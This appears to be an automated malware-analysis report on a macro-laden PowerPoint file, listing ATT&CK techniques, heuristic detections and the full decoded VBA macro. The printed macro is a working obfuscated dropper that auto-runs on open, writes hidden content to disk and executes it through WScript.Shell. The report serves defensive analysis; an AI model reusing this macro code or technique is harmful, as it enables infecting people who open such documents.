MALICIOUS
260
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample is an OOXML document containing a VBA macro with an Auto_Open subroutine. This macro utilizes WScript.Shell and CreateObject to execute commands, specifically attempting to download and save content to a file named 'C:\Windows\Explorer '. The macro's intent is to download and execute a second-stage payload, indicated by the use of Shell() and WScript.Shell.
Heuristics 6
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usage
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1641 bytes |
SHA-256: b70c500fa9b13ab54a479890496f72d4139825c83fddd06783dbcf836927344d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "NpOUTjS"
Public Sub aUtO_oPeN()
wRCMTGV.Show
End Sub
Attribute VB_Name = "wRCMTGV"
Attribute VB_Base = "0{2C7FFF9F-C2FC-494D-968E-1C88A89C380F}{818B8586-A4F2-4C52-BFE5-6E0F44A018DC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public qPeWlgn As New mFaXDHp
Private Sub UserForm_Terminate()
qPeWlgn.mLaaUHX
End Sub
Attribute VB_Name = "mFaXDHp"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Function PrBTmus(rgvSedB)
PrBTmus = Replace(rgvSedB, "¡N.<k7b{.tNC{[Dz[CZU#]b<7$6(_]", "")
End Function
Sub mLaaUHX()
Dim axlMMtb As String: axlMMtb = wRCMTGV.YBMgySu.Tag
Dim uFPzBAL As String: uFPzBAL = PrBTmus(axlMMtb)
Open uFPzBAL For Output As #1
Dim WDePJgj As String: WDePJgj = wRCMTGV.YBMgySu.ControlTipText
Dim HvoVwqL As String: HvoVwqL = PrBTmus(WDePJgj)
Print #1, HvoVwqL
Close
On Error Resume Next
AppActivate "Microsoft PowerPoint Services..."
If Err <> 0 Then
Err = 0
Set zMpiEGl = CreateObject("WScript.Shell")
Set CvYZXSh = zMpiEGl.exEc("C:\Windows\Explorer " & uFPzBAL)
If Err <> 0 Then MsgBox "Can't Stop "
End If
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: ppt/vbaProject.bin | 53760 bytes |
SHA-256: 41406faff6e6215390e24fc5362f12e902e62b2a124d23d4baee42abad122c40 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.